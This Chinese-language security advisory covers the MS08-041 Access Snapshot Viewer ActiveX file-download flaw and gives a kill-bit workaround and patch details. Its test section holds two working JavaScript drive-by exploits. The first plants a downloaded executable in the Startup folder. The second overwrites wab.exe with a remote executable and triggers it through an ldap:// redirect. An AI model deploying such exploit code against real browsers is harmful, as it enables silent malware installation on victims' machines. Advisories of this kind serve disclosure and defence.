安全研究
安全漏洞
Microsoft Access快照查看器ActiveX控件任意文件下载漏洞(MS08-041)
发布日期:2008-07-07
更新日期:2008-08-13
受影响系统:
Microsoft Access 2003描述:
Microsoft Access 2002
Microsoft Access 2000
BUGTRAQ ID: 30114
CVE(CAN) ID: CVE-2008-2463
Microsoft Access是微软Office套件中的关系数据库管理系统。
Microsoft Access中捆绑了快照查看器ActiveX控件用于方便的查看Access报表快照,该控件没有正确的验证某些输入参数。如果用户受骗访问了恶意站点的话,就可能导致将站点上的文件下载到用户机器的任意位置。目前这个漏洞正在被积极的利用。
<*来源:Bill Sisk
链接:http://secunia.com/advisories/30883/
http://www.kb.cert.org/vuls/id/837785
http://www.microsoft.com/technet/security/advisory/955179.mspx?pf=true
http://blogs.technet.com/msrc/archive/2008/07/07/snapshot-viewer-activex-control-vulnerability.aspx
http://www.us-cert.gov/cas/techalerts/TA08-189A.html
http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-225A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if(objlcx="[object]")
{
setTimeout('window.location = "ldap://"',3000);
for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
var buf1 = 'http://192.168.8.10/333.exe';
var buf2=mycars[x];
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
</script>
建议:
临时解决方法:
* 为以下CLSID设置kill bit:
{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}
{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}
{F2175210-368C-11D0-AD81-00A0C90DC8D9}
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-041)以及相应补丁:
MS08-041:Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true
浏览次数:5550
严重程度:0(网友投票)
绿盟科技给您安全的保障